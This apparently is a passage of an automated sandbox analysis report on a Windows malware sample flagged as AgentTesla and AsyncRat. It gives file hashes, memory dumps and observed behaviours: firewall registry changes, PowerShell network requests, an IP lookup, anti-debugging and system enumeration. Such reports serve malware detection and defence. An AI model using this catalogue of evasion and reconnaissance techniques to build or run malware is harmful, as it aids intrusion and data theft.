| SHA256 | 2c7178b4b84c0c6c8e16495b665aa5f1ed22982e13fe1769feada527be6caefe |
| SHA512 | e0a70678715e4a8679673b1a99c2850769a34a00803f8ba25b40651c557fe770af94a5c60bdb4c33c33e664d3f4cd029e0e63ecb3c8ccd49a2d508dc92f43829 |
\Users\Admin\AppData\Local\Temp\DeathCrypter.exe
| MD5 | 88575400ce1bd139f89d3a66aaf8e83d |
| SHA1 | ccf33a9f0002cbcf11bc1db4f39b382d083d120a |
| SHA256 | 2fd42ebaabde3fd44429da6f803ca202a543208be7ec1162360375504ccf2c63 |
| SHA512 | c9b2e316b4b372a93191745ae38cffc7b99b857c3bea52766fa3063edc88bd7ba4fba5cfd40178a0fecb43f322b29b249f5bd15cb6df3b2836931cba30b3f46d |
memory/2588-18-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
memory/2588-19-0x000000013F220000-0x0000000140796000-memory.dmp
memory/2260-25-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2260-24-0x000000001B4B0000-0x000000001B792000-memory.dmp
memory/2588-26-0x0000000000540000-0x0000000000541000-memory.dmp
memory/2348-27-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
memory/2588-28-0x000000001CD10000-0x000000001CF22000-memory.dmp
memory/2588-29-0x000000001C740000-0x000000001C8B2000-memory.dmp
memory/2588-30-0x000000001C200000-0x000000001C2B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab3D22.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar3E22.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 548346ffcf12cb0477b8e524e18d989a |
| SHA1 | 1f4e7529b6340a8b653c3c3a5a12a9106951904f |
| SHA256 | 8ba9a52a4c88e5c2b7f27175a250161a5b54250b2ccd28919009dd1d00d6e9ba |
| SHA512 | 7d3b4f6ed9edd513b77cc9cb842b7439614f07da64ff190753a0b037a9d3aa2454cea5767922cfea0f1f9ff90a9ade775f08f6237e769c1fd328b24958f9cc63 |
memory/2588-98-0x0000000020790000-0x0000000020A36000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 743a25e3ea577d4da3f1f548215b5d0a |
| SHA1 | 101afefb782683f71107680f0fa747445ee22d25 |
| SHA256 | e346878edf6ddbb614e835b33f53f5d6583dba6b232e826e8704adf224c23e4d |
| SHA512 | 09edb8400fea5515025309fa44095d313d8649aa43d677ed0f00a0c6dd7117e5881e6af4630247818ae41e8fe5402c595c80c22d276252c3aa55f2b66a0ea43e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0579157b1be963ebcdcbc1c5925b2e8e |
| SHA1 | 83b40e83e877bb62838f7af21ab87a4123368fcf |
| SHA256 | 0a7be9189dee7bfa14ae54420fee586bd06324ec2321131bd36475ca37d90a22 |
| SHA512 | bd8012391dc8b4f0d3b55728841c16318941dc29e36f4679d8efcd6f4ac857a72c95aa34d1e7e0b97b1011c941373701ee3154da53437d51400ae02591dd12d2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c5def6287ded0354d8cdbd575cc37eec |
| SHA1 | 1f6c9464d11fd1f8efebc697471783d6f6ea7edf |
| SHA256 | 0372da98a87bbd165cad3a4eb570488b1de7f86e58bb93b1e3cedf816a4af4e1 |
| SHA512 | 671dac13c8ab189400e88c23be74ad7ad57bdc5c3aab9ea2ca36bf2b154633b604b7a9de82e1f8b2a36617b9c7df795e63e88e6243c4bb4b5ac20713c5fd062b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1d709f0e606faf70c9d1d60df474207d |
| SHA1 | 3fdbdb1eed6ac2cf085e96faf19c5205c03f99d7 |
| SHA256 | aa84a4876d6d80758b7466531e1de084d08134bdd2bc8b7a161db6476e407010 |
| SHA512 | 492ad592abe0d14843ab7b17f4f14c062a3b09072fb912d079075254d23028ec8df7e2a3ae33b9706658e7e424103400e77144ba2abc1974bc265d2f696013c9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5660f0c1aa5a543902a6406c27a40d6c |
| SHA1 | 80736d8292187d29fb8211205c6c7bc7ed66ac84 |
| SHA256 | 4cb338fbad0dfd381a03df78ab9062eb12422fba0344c045a02116ca0ab756be |
| SHA512 | e3e2efc08eda61700ccf202b3f7f416715343aa649d756987f7531f7f75660c9195c712f7860a964ebefe8815e32026fba34a638090013340c2ac012d44bf724 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8ba59ae7cf6a1cbcc0768d8fe998da58 |
| SHA1 | 5c5b7dd17a1af40b9d3162260ae5b60ee84fe71b |
| SHA256 | 3acf327cfae00b8f5c55ec504a900b7f8d554480c03077735cd28f30614f04f8 |
| SHA512 | ed8ddaccd43b59a0a6dadc5b1a07364ce9d16351b53a8f95379bbe4a00bcd992cd98a6943bea519de5d184f1b994e5967d3535a41404f7739df895574537dfb9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cbad8c0d009abd309567e7a30cd01386 |
| SHA1 | fe13ed222fb41df456658ac755ee66f37be4fb50 |
| SHA256 | 0fec598c3a4b7a608dce2ebd121da0019cc50e61af39c673625d3932f96264c6 |
| SHA512 | d1f7da4962eeaa177c8cf70f2f983625142d32aa23201ab9437debcfa6059a530cb0aca394f5422c551dad177fa383449413d07f7ca250b631d4c0b0bdae5bc3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3dcfc06c04964a79275b04c9123b8314 |
| SHA1 | 1dae60cf4e98cfe0f528b5ee3d1529865e097733 |
| SHA256 | e3026e36606fab5aeb195044308c391219e9e0653657e4816ba5fdf1a8c0c2ee |
| SHA512 | b65d9e79e405af6815ac3f756c5b07b0c113e7197f3060c836eb3a2cccc87f73cbec148b0ccd75fbf2c4b896848dbca59814d58b1354510ebdcbfb146839e8a9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c7c0fef07cc1f35af6bb0cece6eb6f59 |
| SHA1 | f1085177812f0bbf59d434e6d37a37b0e2cb6973 |
| SHA256 | b6474cb1f326a5f0793f3af292342669ac4ec60700edb64ac39d05192f129551 |
| SHA512 | e2c8ddc3be3190367f4e70a763f35f81ed986a656355486c90e42a3b4045717d5a7cfc192a8c65a581584ecc8d67f4cc8d2a0fd4f9f5b9c4d4ee304e785cfa74 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9eeca0a30a5a9ac39430ee4a929a5893 |
| SHA1 | 01a8d0f09b9f8184a5a48898bcf0f64b1f46d0af |
| SHA256 | 274175b5216ac8e42605de3141e3235a96405a293769290add5bdf23f305ece4 |
| SHA512 | 542f8dfa5abd49d4de673f62cbfe58088c97f81398a4abbaf3ee2ca55547f2c18abb74be7c6348fa155809213b060665c5796a63547788e51254f8ab8ebf4831 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | edd4792ef25624c4f7b980460a6af796 |
| SHA1 | 5676087bb9d3463c8adbc8caa0c7873fcfb5f478 |
| SHA256 | 4ffc0470e0f1fc7465555cb04a0e4e9ccec6aee1da6caf4740bb683216c6efc2 |
| SHA512 | 996d2e83c2043954368c64c543330876006d2d85e5fda79a1199c681aba052e5a14e0f774457b899899339a83b5c7d211008cbe48f3cabab29a0f1b74ea5640f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4dfd7bc748b723371e9484672afe6d96 |
| SHA1 | f2cdb3021e430c12246c84f44011840600d7ba00 |
| SHA256 | b371ed87d162601bdc253f38f15d668b05fee39e56fd8c1df69f803dd95ace21 |
| SHA512 | ae3c4ca4b454a9e901fa27bbe9b39efa30a8f26ac05f3342277e2b7d38d098e16d1e498fde531df38a10bdc1efa850fe38364041a2b05d3cc4b6166e059e3677 |
memory/2588-587-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 56f55c3f4f1b67348f6cceb713dda9c1 |
| SHA1 | 40f4fa0486fb07d92a9c6ee312b05ae22ca15f27 |
| SHA256 | a67f7f035dbafbb201e568f3f7c75bcfb5c305fe5f8bb933e0b0314c54cdb7f2 |
| SHA512 | 7edc4b36e44b8ce659f3fbc784e3b32c8fee16e1285ed94add31366bbb67bd87a5301bd9cb4206b517c6c54cbbd1ce3d5057cc3c6521ef9d4ffd30b88b438b5e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c97fc97ac57f1331de4efb5c5b3aaa0e |
| SHA1 | 03e57aa47a3073932fd66366b0720c388164640f |
| SHA256 | 89b4a6059ccdec0a7d6acb6af60d9d62c5989aea373fc966056ee781c1b436b1 |
| SHA512 | 4c590c590c3e1fdd10bcefbab03a670c84a75133fb5c6a74f533f229c5dc5386436d8ce22a6b052cf5e124dd72032d8a1373f49cb95f44b385cf449f9c91b86e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a0667f06c144c6c719c75a9b7ac402cf |
| SHA1 | c24efa98c086d28946137556f7325b0862f8efdd |
| SHA256 | 5f96fbf8c6c1fe717cf3dcc7d6206c70d7e9f1a6f60173562674a3c7ea6ae101 |
| SHA512 | 6220d4264497ad22f071d068fde032c94d8938abb56403846d536948bcd9f43f818ebd34d6ad504381167c0b1f21f518b9590134d22c874f6bfef649df953dde |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aba93041422b29fbfa1b08565b28cb79 |
| SHA1 | 82b305a93599cec172ca06acc4643ef51f1841df |
| SHA256 | 8c9ca3f4f45302510c1b4303f9055243560994ec01bf87709b86a16baa60e6c3 |
| SHA512 | 2469744e5bcaaf219a25838df1c9510cd0ecdb4ba3f5d66ebb75ce753dd84e5fac799543a9e9cd24ef0ac1b66e133a2662efa640494d9af906927f522fc35d4e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9c234b8652589feec8db6d7d610024ca |
| SHA1 | ad662e4153affd76e1f7d9f5eb38653cb5026b85 |
| SHA256 | e403ed426d9d9ac8c886761846856fe2e2edf02f3074c2dd2e622a64a203a511 |
| SHA512 | 92adec16445036af0dd2d6cb47bd0ebdd438e31d5cc9e028eeebb45a53a86ccaaf4a9119eb1a9f05a7031298512c4b8dac07bcd6a2ec2588150aa2f3f43fb10f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | be5dc3aa3a6dd0faabc759bf6963963e |
| SHA1 | 45df723c69a8be1ba3ea3dac33843d63be9d5ff4 |
| SHA256 | d17fd7e18b9bbedf452cb5cd14a3964e6fadbd3d2cf2bcc8252ced086b176342 |
| SHA512 | b3ef47ba4744040a6e0654df261b5deedbc3593d8d9c9123cd0d345107867d2ce4130f4d91908ab3afa2f65eb019698571db29b6a860019c4b342dabcf046170 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c19470e914dbfc1aa69462ed71a293c0 |
| SHA1 | 18f77dee6eb70fddab91d08b2c674027293afd15 |
| SHA256 | 01ba857c11854c57f08d6669defee671aba6cc8b627981db15c0f9e365278197 |
| SHA512 | 756b45f15fbbbc66b50854c8fc1d85bc59fab05351c42c40f4ccbfc8efb4dc3aa79fab9fc5d3116bf8234c426da2162ef517d6430460c8575cf653c905eab39f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 96869a25a436f4941407022ca430e4e1 |
| SHA1 | b1233b72839e3f06981a7958827dfa4f789a916a |
| SHA256 | 132838214c1589432fb60b8afee5cf342f36d5034320f53b1676779ab4d8982f |
| SHA512 | 2f89bb4aea302276c818a3bb2e6ec8dbf3d35f266082bbdcceaccf0596dc27f996562ee597400c4402190f301fd4ff8afa77e46298f1e3632785d5dfaa6033d1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | ed63157c645bf7f9e1c6c6c5a3ecc798 |
| SHA1 | bb22cc40e5c85c8db21ec56bd6df4058d47834e4 |
| SHA256 | ec395e2933b9c9832a01f40e2c13402e1fa6ed3c54ff39975c998496cf6df5bf |
| SHA512 | c1cc2d45917f113b378ae2572e714a2a7176986d27ae9ddee1d58dcfeea4cb851c1c0925f0f3512d69320a2fc547ef23331489c2c88b643d334f42f375caef9d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8967cc8618648625be4f4d45ead3ab32 |
| SHA1 | 835ca9df53b454ccca46823a62c376ee13bfbcdf |
| SHA256 | f218ed86fbe893ba85c4de3ed61fe8621bc83f909d100a019665a7a909e0d936 |
| SHA512 | 61a394f1684d8831b7089450050619ab59f3df2139b22b7b6ae8a16b6b6854e66de5f48eb056fda768e202280a1071d113fdab2153652bd6f68e5d53e99eb510 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8b49880d147d69bf0857ba7ebcf0f7ce |
| SHA1 | 8e912473a83e5fce7a59b67ce9892078677b18eb |
| SHA256 | 8cf6d02645fe285b3ffa000fbc4d4f408456db2939ca4f52845b83404b287a7b |
| SHA512 | fcb9e2af509e5903681a2e5559ee24b32423d18b1b91500f66aec9fdac3298ac77d1be4e85095472634626e8d730d875f5ba2687d62b1474aa807b0dcd5bc7e6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1455db6d01cefdd9f73c27aea4473864 |
| SHA1 | 8c15ff8cb6ef05b31d3a38334e9175d600b8e14f |
| SHA256 | 3c388c806050be3c62179940215d438ccf6b6aea4b53e9734fd16f887c99e94c |
| SHA512 | 98ac42de7849b9bbef5bb4a16b9ce3deb074b2fb0f145950a2276eb225fa4adcd1244a4b51db92c023936fb796df4f95f22ba8de59e536c9b34929b161035aaa |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-04 12:58
Reported
2024-06-04 13:00
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
AgentTesla
AsyncRat
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{BE5B40F9-DA1A-424C-A230-A71B4024715D} = "v2.30|Action=Block|Active=TRUE|Dir=In|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{C7968B49-87F2-4E3D-A343-B2DEFD5269A6} = "v2.30|Action=Block|Active=TRUE|Dir=Out|Name=Microsoft Edge|Desc=Microsoft Edge Browser|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|EmbedCtxt=Microsoft Edge|" | C:\Windows\system32\svchost.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe|Name=Microsoft Edge|Desc=Microsoft Edge Browser|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe|" | C:\Windows\system32\svchost.exe | N/A |
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b651b3f78a1b32f6d0bec0c7aa9a270eb64b35df825cd0f920749fbdc337c318.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Local\Temp\DeathCrypter.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619796298188674" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619796296488717" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133619795264356812" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133619795272370461" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596455532000969" | C:\Windows\system32\svchost.exe | N/A |
